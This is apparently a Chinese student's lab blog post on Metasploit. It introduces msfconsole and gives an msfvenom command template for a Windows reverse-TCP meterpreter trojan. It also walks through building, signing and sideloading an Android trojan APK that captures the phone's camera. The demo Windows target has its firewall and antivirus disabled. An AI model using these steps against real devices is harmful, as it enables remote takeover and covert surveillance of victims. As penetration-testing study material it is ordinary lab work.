0x01.Msfconsole
Msfconsole提供了一个一体化的集中控制台。通过msfconsole,可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集。对于其中的大部分命令,可以输入help[COMMAND],进一步查看该命令的使用帮助信息。
0x02.Windows木马的生成
Windows木马生成流程如下:
格式为:msfvenom -p windows/meterpreter/reverse_tcp lhost=自己地址 lport=端口号 -f exe x>XX.exe
先查询一下攻击机的IP:
则有下列的输入:
将生成的木马放到目标Win10上去即可。因为只是实验,所以关闭了win10的防火墙和查杀软件,实际情况要复杂得多。
0x03.与Windows主机的“互动”
首先,在攻击机设置控制窗口:
只等目标机click生成的木马软件。
进行一些简单的操作:
0x04.与Windows主机的其他“互动”方式
参考:https://xz.aliyun.com/t/2536
0x04.生成Android木马并操作
生成方式和之前的差不多,见下图:
发给手机后,可进行后续的操作。
借鉴:https://blog.csdn.net/u013990050/article/details/61618443
https://blog.csdn.net/qq_41502923/article/details/79151982
不能拿到安卓设备上去直接安装,我们还需要给apk文件签名
签名的话windwos上可以用apk逆向助手,android killer 。安卓上可以用MT文件管理器签名,都是一键化的。
签名完成后,用数据线将安卓设置和windows相连,在adb push,将木马推送上安卓设备上。
在安卓设置上我们用文件管理器来到sdcard目录下,可以看到apk.apk文件,我们点击安装这个软件,可以看到这个木马声请了很多权限:
设置自己网络ip以及端口,手机点击病毒,即可抓取摄像头:
获得截图后,保存在/root文件夹下
其中webscam_snap -i 1:外置摄像头 2:内置摄像头
0x05.总结
考试周,时间不充裕,导致windows的指令才试了几个,安卓的还没找到愿意做实验的对象(笑了哈哈哈)。继续努力!